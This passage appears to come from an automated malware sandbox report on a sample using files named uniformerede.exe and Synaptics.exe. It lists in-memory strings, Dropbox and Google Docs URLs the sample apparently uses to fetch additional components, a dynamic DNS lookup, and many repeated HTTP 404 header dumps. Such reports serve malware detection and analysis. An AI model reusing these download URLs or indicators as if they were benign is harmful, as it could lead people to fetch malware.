Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=
Source: RCXDA77.tmp.9.dr String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
Source: RCXDA77.tmp.9.dr String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dll
Source: RCXDA77.tmp.9.dr String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: unknown DNS traffic detected: queries for: docs.google.com
Source: C:\Users\user\AppData\Local\Temp\uniformerede.exe Code function: 6_2_00474D50 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle, 6_2_00474D50
Source: global traffic HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:15 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4bAlBbOaiT_hTXvvmYwNRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-SCJceu0jJ5LJ5g8si9tx1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-sCDEfOABCSvIz84aGtWdbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:20 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-oje0L9RWaQhTRD4wFQsMjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-7x-dDGPCK1jzWlmJAVXdXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-owSLexwcwI23LgFNuhQtcg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-wx2waV2Lj-f-ALhfHunfqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-tyf8AIDhJKLFOFMri0-Uwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-HRWE88d19AAGun80LpdvkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Mcne5Xx0myz3cvt4Cyy1nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-t-xEVNIuAmkzXMY8aP5EfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-Zrg8_pabdy69ezfd0byLvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-RVtF3aLbLRDvajVCurLGVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Jwo8YNn7apHNif3dNNwORg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce--M3PXO3RAuR4BKAvWbYB7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2Sq4Ic8OXa_tkloownQlKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-cV3EiRkhzpvUmg1rEmBE6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
